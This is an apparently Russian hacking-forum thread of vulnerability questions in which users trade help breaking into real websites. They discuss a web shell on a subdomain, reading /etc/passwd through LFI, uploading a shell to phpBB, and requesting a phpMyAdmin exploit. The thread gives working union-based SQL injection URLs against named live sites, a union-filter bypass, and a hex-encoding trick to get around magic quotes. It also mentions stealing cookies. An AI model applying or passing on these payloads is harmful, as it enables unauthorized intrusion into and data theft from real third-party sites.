Ваши вопросы по уязвимостям.

отсылать куки на сервер или подгружать айфрейм сниффер.

 

При запросе с document.cookie выводит билеберду, что-то похожее на md5, вот так:

 

Столкнулся с проблемой.
есть сайт кпримеру antichat.ru, на нем куча поддоменов.
на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.

 

А кто сказал, что они физически в одном месте располагаются?) НАчать с того, что на уровне DNS может на другие IP отсылаться и заканчивая всякими технологиями виртуализациями и ретрансляторами по принципу балансеров.

 

Это можно предположить с помощью reverse ip.

Рутай.

 

Автор вопроса не предоставил данных reverse ip.

Но всем и так понятно, кто выше отписался, и кого вы прокомментировали, что в конкретном случае у Sleep'a, основной сайт и его поддомены физически разнесены по разным серверам. Да, так бывает, к сожалению, лол. И сей прискорбный факт ввел его в ступор.

Поддерживаю сарказм и легкую иронию всех выше отписавшихся по этому вопросу.

 

ребят,знает кто,чем можно сдампить данные через скулю(error-based) в хэдере client-ip?
sqlmap вроде как не справился...(

 

И что reverseIP ? ФИзически - значит в локации единой как пространство данной конкретной ФС - а это вполне вмещает в себя тот же ксен и тп. И реверс будет один IP отдавать - а человек будет тупить и не понимать - отчего же ему выдает два разных passwd с одного хоста на одном IP

 

Ребята! подскажите сплоит для phpmyadmin 3.3.8 плииз

 

народ, как залить шел в phpBB 2.0.23??
есть возможность разрешать разширения, сделал разширения php разрешонним, но при заливки php файла пишет ошибку Ошибка закачки: Невозможно закачать вложение в ./images/db_337.php.

чёза бред, как быть?

 

старый добрый метод кто отменял?

грузи через восстановление базы

 

там, нет встановления базы

 

не могу вывести

 

крути как блинд

первую букву я тебе уже нашел "C" - char(67)

 

http://www.printingmuseum.org/eventdetail.php?id=-74 union select 1,2,3,4,5,6,7,8,9,10,11

фильтрация union. есть какие-то варианты обойти кроме вслепую?

 

Code:

http://www.printingmuseum.org/eventdetail.php?id=-74+union(select(1),2,3,version(),5,6,7,8,9,10,11)

Вы даже не пытались обойти!

 

http://www.rusmg.ru/php/content.php?id=6721+and+0+union+select+1,version(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--+

Классный совет, хеккер.

 

Что не так делаю?

 

в неправильном синтаксисе:
table_schema=(medray)
Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)
table_schema=0x6d6564726179
или для примера
table_schema=(0x6d6564726179)

 

Благодарю, второй способ с скобками работает, а еще один вопрос назрел: каким сервисом пользоваться, чтобы перевести название слова в 0x.....